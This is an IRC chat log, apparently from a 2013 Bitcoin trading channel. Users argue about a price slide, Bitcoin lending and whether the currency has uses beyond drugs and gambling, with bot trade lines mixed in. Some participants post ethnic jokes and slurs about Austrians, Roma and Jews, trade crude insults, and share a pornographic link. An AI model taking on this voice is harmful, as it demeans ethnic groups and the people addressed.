coupons? Jul 04 00:14:42 those were popular as money substitues Jul 04 00:15:06 you could pay people without having to use the blockchain Jul 04 00:16:08 [BTCTC] [MININGCO.ETF] 1 @ 1.21175 BTC [+] Jul 04 00:16:11 lots of exchangers redeemed them too Jul 04 00:16:36 they had an accident. Jul 04 00:17:03 bitcoin notes are going to have to exist if you want a functioning monetary system Jul 04 00:17:21 but ripples Jul 04 00:17:23 mtgox coupon were a type of btc note Jul 04 00:17:51 solves blockchain growth too Jul 04 00:18:05 if you have reputable parties that issue them like certain exchangers Jul 04 00:18:22 [BTCTC] [TAT.ASICMINER] 4 @ 0.047199 = 0.1888 BTC [-] Jul 04 00:18:49 [BTCTC] [TAT.ASICMINER] 45 @ 0.046501 = 2.0925 BTC [-] Jul 04 00:19:11 bitcoinbust: take a look at ripple, you like it as bitcoin notes? Jul 04 00:19:17 fractional reserve lending is possible inbitcoin as long as there isnt duration mismatch Jul 04 00:19:21 [BTCTC] [CRYPTO-TRADE] 17 @ 0.19999 = 3.3998 BTC [+] Jul 04 00:19:23 [BTCTC] [CRYPTO-TRADE] 5 @ 0.199999 = 1 BTC [+] Jul 04 00:19:37 ie someone having short term liabilities but lending bitcoin claims out for long term Jul 04 00:19:54 bitcoinbust do you have a prepared list of talking points or just going by the feel ? Jul 04 00:20:10 yea really Jul 04 00:20:31 this is tiberius, no? Jul 04 00:20:32 debate the point mircea_popescu as you seem the only one in here with an IQ above 100 Jul 04 00:20:35 same M.O. Jul 04 00:20:47 we're all low-borns with no coin Jul 04 00:20:57 most of you are outright dumb. Jul 04 00:20:59 his topics are his tacklebox Jul 04 00:21:04 hence why i only ask for mircea's opinion Jul 04 00:21:10 fucking stupid plebes Jul 04 00:21:25 jcpham i prefer minions Jul 04 00:21:25 [BTCTC] [ASICMINER-PT] 4 @ 4.700003 = 18.8 BTC [+] Jul 04 00:21:26 until mp insults you too Jul 04 00:21:31 and you call him a dumb fuck Jul 04 00:21:40 shutup thickasthieves. Jul 04 00:21:46 [BTCTC] [BFMINES] 521 @ 0.004 = 2.084 BTC Jul 04 00:21:56 yes, massa Jul 04 00:22:01 like a bunch of worker bees in here with no direction all floating around mircea Jul 04 00:22:11 I'm declaring JUly 3rd as bitcoinbust day from now on Jul 04 00:22:22 well the price did bust lol Jul 04 00:22:29 from now on on July 3rd we'll say " i wish bitcoinbust was here" Jul 04 00:22:43 82, about triple what it might possibly be worth? Jul 04 00:23:52 [BTCTC] [TAT.ASICMINER] 135 @ 0.03 = 4.05 BTC [-] Jul 04 00:24:15 [BTCTC] [S.MPOE-PT] 5 @ 0.000992 = 0.005 BTC [+] Jul 04 00:24:16 deadweasel 42 x 3 = 82 ? Jul 04 00:24:26 82 is a key level Jul 04 00:24:28 79-82 Jul 04 00:24:28 i was being conservative Jul 04 00:24:48 bitcoin is now as oversold as the november 2011 levels Jul 04 00:25:51 i think this is the bottom of the correction Jul 04 00:26:05 thinking was your first problem. Jul 04 00:26:43 btcbust i hope youre right Jul 04 00:26:50 but i suspect otherwise Jul 04 00:26:53 ;;ticker Jul 04 00:26:55 MtGox BTCUSD ticker | Best bid: 82.91000, Best ask: 82.94494, Bid-ask spread: 0.03494, Last trade: 82.91000, 24 hour volume: 48012.69819992, 24 hour low: 81.86753, 24 hour high: 91.20000, 24 hour vwap: 85.72674 Jul 04 00:26:58 bitcoinbust, the germans are innocent. all the crazy dudes actually cme from austria and beyond Jul 04 00:27:00 this is the may 5th low Jul 04 00:27:14 we'll need a good panic sell before this corrects Jul 04 00:27:21 thickasthieves its already occured. Jul 04 00:27:23 [BTCTC] [BITVPS] 10 @ 0.002949 = 0.0295 BTC [+] Jul 04 00:27:25 you should plot to nuke 100km perimeter around vienna Jul 04 00:27:36 i mean a condensed one, a cliff Jul 04 00:27:43 these levels are very important now as its the may 5th levels Jul 04 00:27:47 79-82 Jul 04 00:27:49 i understand that Jul 04 00:27:54 and when 79 breaks... Jul 04 00:28:02 then bitcoin is dead Jul 04 00:28:07 jurov you know that saying about austrians ? Jul 04 00:28:09 [BTCTC] [AMC-PT] 16 @ 0.0021 = 0.0336 BTC [-] Jul 04 00:28:15 which one? Jul 04 00:28:17 poor excuses for germans? Jul 04 00:28:18 bitcoinbust: that's what everyone said when it hit $3 Jul 04 00:28:25 [BTCTC] [BFMINES] 20 @ 0.004 = 0.08 BTC Jul 04 00:28:30 there's two things austrians accomplished in history : convince everyone mozart was austrian Jul 04 00:28:32 and hitler german Jul 04 00:28:38 lol Jul 04 00:28:40 [BTCTC] [TAT.ASICMINER] 3 @ 0.046501 = 0.1395 BTC [+] Jul 04 00:28:59 [MPEX] [S.MPOE] 12350 @ 0.0007725 = 9.5404 BTC [-] Jul 04 00:29:34 mod6: there really isnt any asset class that produces repetitive bubbles in short time frames. if bitcoin heads below these levels its as good as dead for along time. Jul 04 00:30:07 bitcoin is really immune to that sort of logic. Jul 04 00:30:13 how? Jul 04 00:30:41 the falling market cap translates to purchasing power loss due to shrinking service/product market Jul 04 00:31:22 for something to have wild swings at 1bil market cap is disturbing Jul 04 00:31:31 2011 the peak cap was like 150mil or something Jul 04 00:31:44 [BTCTC] [TAT.ASICMINER] 41 @ 0.047199 = 1.9352 BTC [+] Jul 04 00:31:46 [BTCTC] [TAT.ASICMINER] 6 @ 0.0474 = 0.2844 BTC [+] Jul 04 00:31:48 [BTCTC] [TAT.ASICMINER] 18 @ 0.0474 = 0.8532 BTC [+] Jul 04 00:32:00 this bubble was 4x smaller than the previous one Jul 04 00:32:18 bitcoinbust the market cap considerations fail to account for your earlier "how can i stand it" Jul 04 00:32:32 [BTCTC] [TAT.ASICMINER] 2 @ 0.0474 = 0.0948 BTC [+] Jul 04 00:32:35 most large btc holders don't give a shit, as their btc wealth is meaningless to them Jul 04 00:32:39 kakobrekla: yea its rare that bubble repeat in magnitude Jul 04 00:32:44 at least comparatively to the success of bitcoin Jul 04 00:33:29 mircea_popescu: what do you mean? Jul 04 00:33:56 your saying large holders arent impacted by paperwealth changes Jul 04 00:33:57 i mean my bitcoin fortune is not meaningful to me through the interim of some fiat evaluation. Jul 04 00:34:16 my bitcoin fortune is only meaningful to me through its potential to completely destroy fiat and all that it supports. Jul 04 00:34:33 i don't want 1bn or 1trn dollars for it. Jul 04 00:34:38 i want to see the fed bankrupt. Jul 04 00:34:49 evil laugh. Jul 04 00:34:55 they already are from their own actions Jul 04 00:34:58 1 billion would be a nice bonus Jul 04 00:35:13 the fed is technically insolvent if interest rates rise to 3.5-4% Jul 04 00:35:26 i'm sortof looking forward to using the deflationary property to my advantage at all times Jul 04 00:35:37 no need for bonus, mp is already trying to set himself up as an institution Jul 04 00:35:52 if btc succeeds in his way, then billiobns will be only the beginning Jul 04 00:35:56 delfation is only a problem when there is excessive none productive credit issued Jul 04 00:36:27 hence why anyone would lend bitcoins for a % baffles me Jul 04 00:36:58 [BTCTC] [ASICMINER-PT] 1 @ 4.799989 BTC [+] Jul 04 00:37:07 odds are you the debt will be defaulted on Jul 04 00:37:13 [BTCTC] [TAT.ASICMINER] 10 @ 0.0485 = 0.485 BTC [+] Jul 04 00:37:26 outside of mpoe bonds the only meaningful scheme for lending i know of is dooglus' Jul 04 00:37:43 mpoe bonds are a horrible lending scheme Jul 04 00:38:01 bondholders get exposed to fat tail events for little return. Jul 04 00:38:31 that's how just-dice works too. Jul 04 00:38:33 not much exposure anymore... Jul 04 00:38:41 the site could lose 50000000 btc in the next five minutes. Jul 04 00:38:45 [BTCTC] [BFMINES] 120 @ 0.004 = 0.48 BTC Jul 04 00:38:59 yes just-dice risk reward is stupid Jul 04 00:39:52 well stupid or not stupid, it's the only meaningful lending there is out there. Jul 04 00:40:03 just-dice is easier to predict vs insuring against bitcoin volatility which is what mpoe-bonds do Jul 04 00:40:04 in the sense that the fat tail is verifiable a fat tail Jul 04 00:40:13 not just a declaratory exercise of the operator Jul 04 00:40:18 as in... sorry, we lost teh coins Jul 04 00:40:38 i hate "sorry we lost thy coins" Jul 04 00:40:44 bitcoins nature is anti debt Jul 04 00:40:58 it encourages equity financing vs debt financing Jul 04 00:41:12 you make sense again bitcoinbust, congrats Jul 04 00:41:15 it does, which is why the an0 so heavily punishes misstated debts. Jul 04 00:41:23 yes Jul 04 00:41:32 [BTCTC] [TAT.ASICMINER] 45 @ 0.047001 = 2.115 BTC [-] Jul 04 00:41:48 eventually bitcoins end up in smarter hands Jul 04 00:42:06 as stupid creditors and stupid borrowers lose them Jul 04 00:42:35 i guess the one positive feature of bitcoin is idiots cant last long Jul 04 00:42:46 [BTCTC] [TAT.ASICMINER] 1 @ 0.048499 BTC [+] Jul 04 00:43:04 [BTCTC] [TAT.ASICMINER] 1 @ 0.047 BTC [-] Jul 04 00:43:04 they seem to persist pretty good so far... Jul 04 00:43:08 [BTCTC] [TAT.ASICMINER] 1 @ 0.047 BTC [-] Jul 04 00:43:11 not really Jul 04 00:43:19 lots got wiped out in pirate Jul 04 00:43:25 they all left Jul 04 00:43:47 all of them Jul 04 00:43:48 haha not quite Jul 04 00:43:49 lol Jul 04 00:43:57 well the ones who lost all their coins Jul 04 00:44:03 were to broke to buy back in Jul 04 00:44:04 all of them Jul 04 00:44:31 who can argue with such perfect logic Jul 04 00:44:31 most active pirate participants are those who encouraged and promoted the scam Jul 04 00:44:35 like chaang-noi Jul 04 00:44:44 gone for sure, goat is Jul 04 00:44:53 he was selling it Jul 04 00:45:09 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.004376 BTC [+] Jul 04 00:45:20 anyways its besides the point, most people keep applying fiat credit rules to bitcoin Jul 04 00:45:29 it just doesnt work, compound interest is impossible in bitcoin Jul 04 00:45:34 [BTCTC] [TAT.ASICMINER] 1 @ 0.046601 BTC [-] Jul 04 00:45:43 [BTCTC] [TAT.ASICMINER] 1 @ 0.0466 BTC [-] Jul 04 00:45:44 [BTCTC] [TAT.ASICMINER] 3 @ 0.0465 = 0.1395 BTC [-] Jul 04 00:45:50 [BTCTC] [TAT.ASICMINER] 5 @ 0.046102 = 0.2305 BTC [-] Jul 04 00:46:11 [BTCTC] [TAT.VIRTUALMINE] 4 @ 0.004376 = 0.0175 BTC [+] Jul 04 00:46:24 fractional reserve lending is entirely possible in bitcoin but only to prudent borrowers Jul 04 00:46:34 consumption loans are impossible Jul 04 00:49:11 [BTCTC] [BFMINES] 100 @ 0.004 = 0.4 BTC Jul 04 00:49:27 [BTCTC] [S.MPOE-PT] 1 @ 0.000992 BTC [+] Jul 04 00:51:27 [BTCTC] [BFMINES] 6 @ 0.004 = 0.024 BTC Jul 04 00:53:05 [BTCTC] [TAT.ASICMINER] 6 @ 0.0465 = 0.279 BTC [+] Jul 04 00:53:07 [BTCTC] [TAT.ASICMINER] 1 @ 0.046103 BTC [-] Jul 04 00:53:12 [BTCTC] [TAT.ASICMINER] 17 @ 0.046102 = 0.7837 BTC [-] Jul 04 00:54:11 massive dumping Jul 04 00:54:30 [BTCTC] [AMC-PT] 3 @ 0.00191 = 0.0057 BTC [-] Jul 04 00:54:31 [MPEX] [S.MPOE] 4690 @ 0.0007725 = 3.623 BTC [-] Jul 04 00:54:33 chump change Jul 04 00:54:37 6k pff Jul 04 00:54:45 ;;ticker Jul 04 00:54:46 MtGox BTCUSD ticker | Best bid: 82.32505, Best ask: 82.97895, Bid-ask spread: 0.65390, Last trade: 82.97896, 24 hour volume: 55770.48273055, 24 hour low: 80.06000, 24 hour high: 91.20000, 24 hour vwap: 85.07813 Jul 04 00:55:12 [BTCTC] [TAT.ASICMINER] 3 @ 0.046102 = 0.1383 BTC [-] Jul 04 00:55:47 i see 80.7 Jul 04 00:56:27 [BTCTC] [TAT.ASICMINER] 1 @ 0.046102 BTC [-] Jul 04 00:56:39 it hit 80 Jul 04 00:56:50 [BTCTC] [TAT.ASICMINER] 35 @ 0.046102 = 1.6136 BTC [-] Jul 04 00:57:17 tank mode Jul 04 00:57:23 http://kimberjamesblog.com/wp-content/uploads/2012/11/kimber-james-ass-fucked-01.jpg Jul 04 00:57:27 worst boobs ever to celebrate. Jul 04 00:57:56 i-i-it has a dick Jul 04 00:58:18 just a lil one, dont worry Jul 04 00:59:22 [BTCTC] [TAT.ASICMINER] 3 @ 0.046102 = 0.1383 BTC [-] Jul 04 00:59:56 bitcoin now down double digits on the session Jul 04 01:00:21 [BTCTC] [ASICMINER-PT] 1 @ 4.750007 BTC [-] Jul 04 01:00:21 jurovs dream of retiring on a 0.01 btc monthly income are over Jul 04 01:00:39 [BTCTC] [TAT.ASICMINER] 47 @ 0.046102 = 2.1668 BTC [-] Jul 04 01:01:43 whats a session Jul 04 01:01:52 !t m ^oix Jul 04 01:01:54 [MPEX:^OIX] 1D: 0 / 0 / 0 (0 shares, 0 BTC), 7D: 60.4706933 / 61.22001468 / 114.42277287 (1550 shares, 855.98 BTC), 30D: 0 / 0 / 0 (0 shares, 0 BTC) Jul 04 01:02:00 plenty to go to 61. Jul 04 01:02:23 people are realizing outside of drugs and gambling there is nowhere to spend their coins Jul 04 01:03:03 that's certainly fucking true Jul 04 01:03:18 and reddit tipping Jul 04 01:03:22 so long as amazon doesn't start taking them Jul 04 01:03:34 i never heard of anything collapsing because "there's nothing but booze and gambling" Jul 04 01:03:35 bitcoinstore failed as an amazon replica Jul 04 01:03:41 the pirate ports did great. Jul 04 01:03:44 what about gyft.com Jul 04 01:03:46 because supply chain? Jul 04 01:03:48 lots of options there Jul 04 01:03:58 50 dollar gift cards? Jul 04 01:04:04 no Jul 04 01:04:07 $1000 amazon Jul 04 01:04:11 $500 Lowes Jul 04 01:04:12 loltrue mircea_popescu Jul 04 01:04:12 etc Jul 04 01:04:25 people are going to go back to loving silkroad as the only provider of btc liquidity Jul 04 01:04:59 so you arent going to factor a service that pretty much lets you buy anything? Jul 04 01:05:08 which service is that Jul 04 01:05:17 the one you just dismissed Jul 04 01:05:27 maybe look at it Jul 04 01:05:29 its great that tiberius takes time out of his balling schedule to educate us every day Jul 04 01:05:43 a fucking mobile phone giftcard store? Jul 04 01:06:01 you fucking turdburger Jul 04 01:06:08 so do i have to buy 10 gift cards to buy an item? Jul 04 01:06:15 if its expensive Jul 04 01:06:27 and sit there redeeming them Jul 04 01:06:29 $1000 amazon card Jul 04 01:06:30 mobile minutes is the new bitcoin, ask africa Jul 04 01:06:36 lol Jul 04 01:06:38 lovely skeumorphs Jul 04 01:06:51 [BTCTC] [ASICMINER-PT] 1 @ 4.666006 BTC [-] Jul 04 01:06:51 thickasthieves how much do they take for comission Jul 04 01:06:52 look at their selection Jul 04 01:07:02 depends i think Jul 04 01:07:16 so basically 1500 fiat dollars turn into a 1k amazon gift card Jul 04 01:07:23 only thing they dont really have reasonably available is card towards groceries Jul 04 01:07:23 after i go through the process Jul 04 01:07:28 no Jul 04 01:07:40 3 4% bitinstant transactions Jul 04 01:07:51 72hrs to get orders filled while the price changes by 20-30% Jul 04 01:08:02 then gyft comission, then my amazon card Jul 04 01:08:14 24.3181btc for $2000 amazon card at the moment Jul 04 01:08:28 yea go try getting those 24 btc in a timely fashion Jul 04 01:08:37 i already have them Jul 04 01:08:54 thats nice once youve spent them then what? you have no bitcoin income Jul 04 01:09:03 [BTCTC] [AMC-PT] 22 @ 0.0021 = 0.0462 BTC [+] Jul 04 01:09:13 the only people actively buying gyft products are the silk road dealers Jul 04 01:09:17 [BTCTC] [DMS.MINING] 13 @ 0.02 = 0.26 BTC [-] Jul 04 01:09:20 [BTCTC] [DMS.MINING] 1 @ 0.02 BTC [-] Jul 04 01:09:22 [BTCTC] [ASICMINER-PT] 1 @ 4.666008 BTC [+] Jul 04 01:09:25 ;;next Jul 04 01:09:26 Error: Couldn't get RSS feed. Jul 04 01:09:38 1k amazon card converted to cash at a 5% discount on the street Jul 04 01:09:47 [BTCTC] [DMS.SELLING] 14 @ 0.029001 = 0.406 BTC [+] Jul 04 01:10:22 you realize that all goods end up tied to fiat Jul 04 01:10:33 hence my point Jul 04 01:10:41 that bitcoin is worthless? Jul 04 01:10:43 theres 0 incentive to use bitcoin to buy gyft cards Jul 04 01:10:53 unless you have a bitcoin derived income Jul 04 01:11:03 there is that problem Jul 04 01:11:05 which is almost nobody outside of scammers and drugdealers Jul 04 01:11:11 i do have bitcoin derive dincome Jul 04 01:11:11 and us miserable coders Jul 04 01:11:21 lol thickasthieves from what? Jul 04 01:11:26 collecting sdice dividends Jul 04 01:11:37 from being smarter than you Jul 04 01:11:53 so your the one offering webcam shows to reddit users Jul 04 01:11:55 you need to lurk moar, TAT is the piep piper of micro pass throughs Jul 04 01:12:04 pied* Jul 04 01:12:08 yea transfer schemes Jul 04 01:12:20 Well, he certainly hasn't put one up for S.MG yet. Jul 04 01:12:28 those schemes have a diminishing rate of return Jul 04 01:12:29 i will be Jul 04 01:12:35 [BTCTC] [TAT.ASICMINER] 2 @ 0.047999 = 0.096 BTC [+] Jul 04 01:12:36 so you've been saying for weeks now. Jul 04 01:12:41 he's making banque taxing kids on thier allowance Jul 04 01:13:11 you underestimate the money that can be made providing liquidity and these assets Jul 04 01:13:13 basically the bitcoin economy is 2 things, the selling of drugs and all sorts of wealth transfer schemes(speculators, gambling, mpex) Jul 04 01:13:37 however these are not the only services i provide Jul 04 01:13:37 thickasthieves the "assets" derive their income from shuffling wealth around, its a diminishing rate of return Jul 04 01:13:49 you run out of bitcoins to extract Jul 04 01:13:50 [BTCTC] [TAT.ASICMINER] 23 @ 0.047999 = 1.104 BTC [+] Jul 04 01:13:54 the assets have their own value as well Jul 04 01:13:59 [BTCTC] [TAT.ASICMINER] 2 @ 0.047999 = 0.096 BTC [+] Jul 04 01:14:02 they decline over time Jul 04 01:14:13 we all must die Jul 04 01:14:16 there are no real bitcoin companies adding value Jul 04 01:14:28 just shuffling wealth from 1 party to another Jul 04 01:14:49 that shuffle has a maximum limit Jul 04 01:15:02 +! Jul 04 01:15:05 +1 Jul 04 01:15:07 why dont bitcoiners understand simple math? Jul 04 01:15:16 Geez, do we have another troll in our midst? *tsk* Jul 04 01:15:23 just an old friend Jul 04 01:15:30 furuknap: no, its the same one Jul 04 01:15:41 :-) Jul 04 01:15:43 right a troll from stating facts? Jul 04 01:15:58 what kind of bitcoin business would pass muster Jul 04 01:16:03 Like "Why don't bitcoiners understand simple math" fact? Jul 04 01:16:05 silkroad is by far the largest value added segment of the bitcoin ecosystem at this point Jul 04 01:16:10 other than gambling and financial instruments Jul 04 01:16:20 silkroad leaks to fiat Jul 04 01:16:22 porn Jul 04 01:16:25 like every other one Jul 04 01:16:26 bitcoin is all about maff Jul 04 01:16:33 and also, fings Jul 04 01:16:38 bitcoin != bitcoiners Jul 04 01:16:48 I would say I understand basic maff, so the statement is proven wrong. Jul 04 01:16:56 Thus trolling. Jul 04 01:16:56 this spread is 100$ retarded Jul 04 01:17:15 OHSHI Jul 04 01:17:21 there is no wholly bitcoin economy that could provide a pure bitcoin service Jul 04 01:17:22 thickasthieves: silkroad exists because it provides a service that is difficult to obtain using traditional payment systems Jul 04 01:17:35 [BTCTC] [TAT.ASICMINER] 5 @ 0.0462 = 0.231 BTC [-] Jul 04 01:17:37 [BTCTC] [TAT.ASICMINER] 50 @ 0.046101 = 2.3051 BTC [-] Jul 04 01:17:39 [BTCTC] [TAT.ASICMINER] 1 @ 0.046101 BTC [-] Jul 04 01:17:41 [BTCTC] [TAT.ASICMINER] 5 @ 0.0461 = 0.2305 BTC [-] Jul 04 01:17:43 [BTCTC] [TAT.ASICMINER] 8 @ 0.046031 = 0.3682 BTC [-] Jul 04 01:17:45 [BTCTC] [TAT.ASICMINER] 16 @ 0.04603 = 0.7365 BTC [-] Jul 04 01:17:47 the other segment is gambling, Jul 04 01:17:52 Yeah because drug trade had so much trouble shuffling stuff around prior to 2009... Jul 04 01:17:53 outside of those 2 things bitcoin is useless Jul 04 01:18:13 [BTCTC] [ASICMINER-PT] 6 @ 4.738993 = 28.434 BTC [+] Jul 04 01:18:15 furuknap: bitcoin makes it more convenient for nickle and dimer dealers and buyers Jul 04 01:18:15 what about arbitraging currency controls? Jul 04 01:18:16 seems to be good at giving you somehting to bitch about Jul 04 01:18:18 [BTCTC] [ASICMINER-PT] 1 @ 4.739 BTC [+] Jul 04 01:18:23 [BTCTC] [ASICMINER-PT] 2 @ 4.74 = 9.48 BTC [+] Jul 04 01:18:35 [BTCTC] [ASICMINER-PT] 1 @ 4.749 BTC [+] Jul 04 01:18:39 [BTCTC] [ASICMINER-PT] 100 @ 4.75 = 475 BTC [+] Jul 04 01:18:41 furuknap: you dont have to meet up customers Jul 04 01:18:42 whoa Jul 04 01:18:52 [BTCTC] [ASICMINER-PT] 1 @ 4.75 BTC [+] Jul 04 01:18:53 [BTCTC] [TAT.ASICMINER] 36 @ 0.04603 = 1.6571 BTC [-] Jul 04 01:18:54 big spenda Jul 04 01:19:04 And of course, gambling didn't work either before 2009. What a lesson in history this has been. Well, I'm off to do some computations, which would be impossible since I don't understand basic maff. Jul 04 01:19:10 ;;ticker Jul 04 01:19:12 MtGox BTCUSD ticker | Best bid: 80.00000, Best ask: 80.18900, Bid-ask spread: 0.18900, Last trade: 79.99900, 24 hour volume: 61657.68787268, 24 hour low: 78.80000, 24 hour high: 91.20000, 24 hour vwap: 84.63045 Jul 04 01:19:15 oh furuknap Jul 04 01:19:15 I have 79.97 Jul 04 01:19:21 chill man Jul 04 01:19:22 US payment processors were banned from gambling Jul 04 01:19:28 wait wait Jul 04 01:19:32 in 2010 or something Jul 04 01:19:41 we CAN NOT let bitcoinbust and furuknap engage in debate Jul 04 01:19:54 yeah Jul 04 01:20:20 well we're only at 4k lines today. Jul 04 01:20:27 79 btc Jul 04 01:20:41 I'll stand down. Jul 04 01:20:43 this is the end Jul 04 01:20:53 see what you did furuknap Jul 04 01:21:05 too much stating of the obvious in one place Jul 04 01:21:20 thickasthieves the bitcoin income generator Jul 04 01:21:28 by creating pass thru's for useless assets Jul 04 01:21:31 dub, ThickAsThieves, no you did it. prevented the drama, hence btc crash Jul 04 01:21:32 lol Jul 04 01:21:43 hrm Jul 04 01:21:45 sorry Jul 04 01:21:47 furuknap, pls continue Jul 04 01:21:48 only bigger joke then TaT is that central park guy Jul 04 01:21:55 gathering around the willow tree to exchange crypto Jul 04 01:22:00 lol Jul 04 01:22:17 what exactly is the objection there ? Jul 04 01:22:29 dude's visible Jul 04 01:22:36 = target Jul 04 01:22:46 ya im sure people won't find central park w/o mjr. Jul 04 01:22:47 providing convenience is okay when you are SR, but not when you are MJR Jul 04 01:22:49 seems logical. Jul 04 01:22:50 jesus was atarget too Jul 04 01:22:54 lol mircea Jul 04 01:22:56 i guess we aren't creating value and thus whole btc thing will die? Jul 04 01:23:16 jurov what value do you create besides provider a venue for people to lose their BTC to mircea? Jul 04 01:23:19 ya ya. after all the pump talk comes all the gloom talk. Jul 04 01:23:26 furuknap, pls continue >OK. I COMPUTE PEOPLE LIKE YOU FOR BREAKFAST! Jul 04 01:23:36 we care deeply because being in btc means we;'re dedicating our lives to chatting up passer-bys Jul 04 01:23:38 lol Jul 04 01:23:42 timberrrrrr Jul 04 01:23:52 i told you a cliff was needed Jul 04 01:23:56 here it comes Jul 04 01:24:02 bitcoinbust: i'm actually fine with that Jul 04 01:24:09 Getting more and more lucky by the minute... Jul 04 01:24:38 78 Jul 04 01:24:44 [BTCTC] [ASICMINER-PT] 7 @ 4.700004 = 32.9 BTC [-] Jul 04 01:24:51 [BTCTC] [ASICMINER-PT] 1 @ 4.7 BTC [-] Jul 04 01:25:12 [BTCTC] [TAT.ASICMINER] 5 @ 0.047995 = 0.24 BTC [+] Jul 04 01:25:14 asicminer implodes with the price? Jul 04 01:25:17 Next support at 75. Jul 04 01:25:28 Of course; nobody wants worthless money. Jul 04 01:25:40 77.8 Jul 04 01:25:57 back to foodstamps and welfare rolls for bitcointalk forums Jul 04 01:26:02 lol Jul 04 01:26:05 .5 Jul 04 01:26:05 TAT gonna be busy tonight Jul 04 01:26:15 :) Jul 04 01:26:27 .0 Jul 04 01:26:30 funny, mpoe dropped off early and now is stable Jul 04 01:26:36 asicminer started dropping later Jul 04 01:26:43 mircea it doesnt count when you trade with yourself Jul 04 01:26:59 76 Jul 04 01:27:00 which one of the two ? Jul 04 01:27:03 [BTCTC] [ASICMINER-PT] 1 @ 4.7 BTC [-] Jul 04 01:27:04 76.2 Jul 04 01:27:17 https://www.tradingview.com/e/?symbol=MTGOX%3ABTCUSD Jul 04 01:27:20 New Chart - TradingView Jul 04 01:27:44 every time you trade with yourself god kills a kitten Jul 04 01:27:56 noooooooo Jul 04 01:28:08 bitcoinbust: no that's me trading with myself too :D mp even had to add cross trades to mpex protocol due to my complaints Jul 04 01:28:15 Rollercoaster! WHEEEEE! Jul 04 01:28:47 is it under 60 yet ? Jul 04 01:28:49 anyone wanna call the bottom? Jul 04 01:28:51 [BTCTC] [TAT.ASICMINER] 3 @ 0.047995 = 0.144 BTC [+] Jul 04 01:29:04 mircea_popescu what type of losses are you seeing under 60 Jul 04 01:29:08 on those options Jul 04 01:29:09 $avg Jul 04 01:29:12 like none Jul 04 01:29:14 i dunno, some btc Jul 04 01:29:29 mpexbot down? Jul 04 01:29:42 why sell options when you need them? Jul 04 01:29:47 i dunno wtf smickles is doing Jul 04 01:29:51 smickles hey! Jul 04 01:30:05 [MPEX] [S.MPOE] 8900 @ 0.00077339 = 6.8832 BTC [+] Jul 04 01:30:09 peter vessenes should step in to stabalize the market Jul 04 01:30:09 maybe jesus can help Jul 04 01:30:13 jesus hey! Jul 04 01:30:19 ;;seen smickles Jul 04 01:30:20 smickles was last seen in #bitcoin-assets 12 weeks, 6 days, 6 hours, 47 minutes, and 47 seconds ago: a bitcoin atm could be the easiest way to send money to a friend, each of you just goes to an atm Jul 04 01:30:39 12 weeks? Jul 04 01:30:48 [BTCTC] [ASICMINER-PT] 1 @ 4.7 BTC [-] Jul 04 01:30:52 mircea_popescu: remember max keisers ridiculous 100 peg article Jul 04 01:31:10 not rly. Jul 04 01:31:19 [BTCTC] [TAT.ASICMINER] 2 @ 0.047994 = 0.096 BTC [-] Jul 04 01:32:38 ;;next Jul 04 01:32:39 Error: Couldn't get RSS feed. Jul 04 01:32:51 jurov where are you from? Jul 04 01:32:57 ;;goxlag Jul 04 01:32:58 which eastern european country Jul 04 01:32:59 MtGox lag is 1.392895 seconds. During this time, light travels 0.00279134598437 AU. You could have sent a bitcoin from Jupiter to its third largest moon, Io (0.002819 AU). Jul 04 01:33:08 [BTCTC] [TAT.VIRTUALMINE] 50 @ 0.004001 = 0.2001 BTC [-] Jul 04 01:33:11 i'm from somalia.together with kakobrekla Jul 04 01:33:16 didnt you know? we're all gypsies in here Jul 04 01:33:37 id guess you are from some type of a nazi allied country based on your german sympathies Jul 04 01:33:46 [BTCTC] [TAT.VIRTUALMINE] 20 @ 0.004 = 0.08 BTC [-] Jul 04 01:33:46 [BTCTC] [TAT.VIRTUALMINE] 16 @ 0.004 = 0.064 BTC [-] Jul 04 01:33:47 [BTCTC] [TAT.VIRTUALMINE] 225 @ 0.004 = 0.9 BTC [-] Jul 04 01:33:51 so either ukraine or slovakia Jul 04 01:33:52 bingo! Jul 04 01:33:53 '"Gypped" is arguably the most commonly used racist term in existence today.' Jul 04 01:34:10 bitcoinbust: what did you do for a job before educating bitcoiners? Jul 04 01:34:22 slovia has gorgeous mountain ranges but some of the worst food ive ever eaten Jul 04 01:34:23 don't remember biggest ally of nazi germany was actually the US Jul 04 01:34:23 selling comic books Jul 04 01:34:25 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00397 BTC [-] Jul 04 01:34:26 slovakia* Jul 04 01:34:41 at least financially Jul 04 01:34:51 jurov slovakia or ukraine? Jul 04 01:34:59 slovakia Jul 04 01:35:20 are you close to those mountains they have Jul 04 01:35:23 so what fiats ARE working normally out of Gox anyway? Jul 04 01:35:26 along the border with poland Jul 04 01:35:39 if you sell off for USD Jul 04 01:35:40 [BTCTC] [BASIC-MINING] 1 @ 0.175599 BTC [+] Jul 04 01:35:41 then what? Jul 04 01:35:41 they are along pretty much all borders Jul 04 01:35:50 i was confused to how those gypsies got to slovakia that were all over the sides of the road? Jul 04 01:36:13 they were born there. since nazis failed to exterminate them Jul 04 01:36:13 romania send busloads over on free vacations? Jul 04 01:37:13 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00396 BTC [-] Jul 04 01:37:15 no they usually go to vacations to canada or so Jul 04 01:37:43 hehe i remember when the czech was doing that Jul 04 01:37:52 canadians revoked their visa free status Jul 04 01:38:13 Savior of Bitcoin http://www.thebitmunchies.com/ Jul 04 01:39:29 jurov is slovakia wealthier then poland? Jul 04 01:39:41 kinda Jul 04 01:39:49 [BTCTC] [TAT.ASICMINER] 11 @ 0.046051 = 0.5066 BTC [-] Jul 04 01:40:04 jurov will you be my friend? Jul 04 01:40:18 [BTCTC] [BASIC-MINING] 4 @ 0.166401 = 0.6656 BTC [-] Jul 04 01:40:22 ThickAsThieves: you aren't already? Jul 04 01:40:23 76.5 Jul 04 01:40:24 jewrov are you jewish Jul 04 01:40:27 http://www.thebitmunchies.com/index.php?cPath=60&osCsid=ff9880clshqp0va6qjfq5qgr82 Jul 04 01:40:30 Pipe and Smoke, theBitMunchies.com Jul 04 01:40:33 obviously not silk road Jul 04 01:41:15 http://www.washingtonpost.com/blogs/wonkblog/wp/2013/07/03/the-inventor-of-the-mouse-has-died-heres-why-his-invention-took-30-years-to-catch-on/?wprss=rss_policy&tid=pp_widget Jul 04 01:41:17 The inventor of the mouse has died. Here’s why his invention took 30 years to catch on. Jul 04 01:41:27 bitcoin has 27 years to go before it catches on Jul 04 01:41:33 jurov: slovakia, home of the bratisla-boys -> http://www.youtube.com/watch?v=LpE1bJp8-4w Jul 04 01:41:57 [BTCTC] 